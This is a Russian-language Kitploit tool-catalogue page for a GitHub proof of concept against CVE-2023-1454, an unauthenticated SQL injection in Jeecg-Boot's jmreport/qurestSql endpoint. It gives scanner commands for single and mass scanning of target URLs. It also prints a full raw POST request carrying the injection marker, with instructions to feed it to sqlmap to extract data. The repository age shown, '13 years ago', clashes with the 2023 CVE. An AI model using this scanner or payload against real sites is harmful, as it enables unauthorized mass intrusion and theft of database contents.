Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-1454 — jmreport/qurestSql — PoC массового сканирования SQL-инъекций без авторизации | Kitploit
Инструменты/GitHubGitHub/cjybao/cve-2023-1454
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcjybao/cve-2023-1454

CVE-2023-1454

jmreport/qurestSql — PoC массового сканирования SQL-инъекций без авторизации

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-1454

jmreport/qurestSql — PoC массового сканирования неавторизованных SQL-инъекций Jeecg-Boot — это платформа быстрой разработки на основе Spring Boot и Jeecg-Boot-Plus. В последней версии jeecg-boot 3.5.0 было обнаружено несколько SQL-инъекций.

Использование инструмента

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 — проверка одного URL

python3 CVE-2023-1454-scan.py -f url.txt — массовое сканирование

После завершения сканирования в текущем каталоге будет создан файл vuln.txt с URL-адресами уязвимых сайтов.

PoC:

Эксплойт:

Сохраните пакет в txt — sqlmap сможет получить данные.

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129

{"apiSelectId":"1290104038414721025",
"id":"1*"}

Отказ от ответственности

Любые прямые или косвенные последствия и убытки, вызванные распространением или использованием информации, предоставленной в этом документе, возлагаются на самого пользователя. Автор не несёт за это никакой ответственности.

Скачать инструмент